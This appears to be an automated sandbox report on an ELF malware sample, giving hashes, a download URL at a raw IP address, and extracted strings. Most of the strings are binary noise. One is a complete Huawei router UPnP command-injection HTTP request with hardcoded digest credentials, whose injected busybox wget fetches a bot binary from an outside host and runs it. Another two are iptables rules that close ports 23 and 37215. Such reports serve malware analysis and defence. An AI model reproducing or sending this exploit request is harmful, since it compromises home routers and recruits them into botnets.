Sample details: a3bc20b9991e805e6f7db7848b3eac09 --

Hashes
MD5: a3bc20b9991e805e6f7db7848b3eac09
SHA1: b783f49b03871da133931aff0c7365a5d88adb08
SHA256: 6d3001cd307ff067f86d16660c91bf6e1b4d274152255e68d088f22446b49413
SSDEEP: 768:0n0a9xDwttuUGwJnHeNejbnzeyjuDHMddca8CpLomZtRWUCpkL:40a7Dwtt1YszjcsddQ1iiUCpkL
Details
File Type: ELF
Yara Hits
Source
http://185.62.190.159/bins/sh4.idopoc
Strings
		/sm"O,
qsj !<
Lds`La
Lds`La
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
/Sn"O}
P)'#a)#
AmB{!+#;!
}b`fBr-a
 (w$Q.u
P)'#a)#
AmB{!+#;!
=b4r-a
-b,j|a
d$Q u@
P)'#a)#
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
#nla,b
`"1!Cc
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
P2c003
3a9'CV9"
C)#8#b
"Bc#`ra
Gz#:"* 
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
Z&#c\3
A,b+!p1
3l	|3j
0e1T\e
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
g3amA|1Qf
ql22,!!!%
$Q#d3ew
BSa;":
#{";"$
3g3a9"
A;"{!+!>
Rba(1v1
V2a,6f
As`\1s:
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
gb/#fba
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors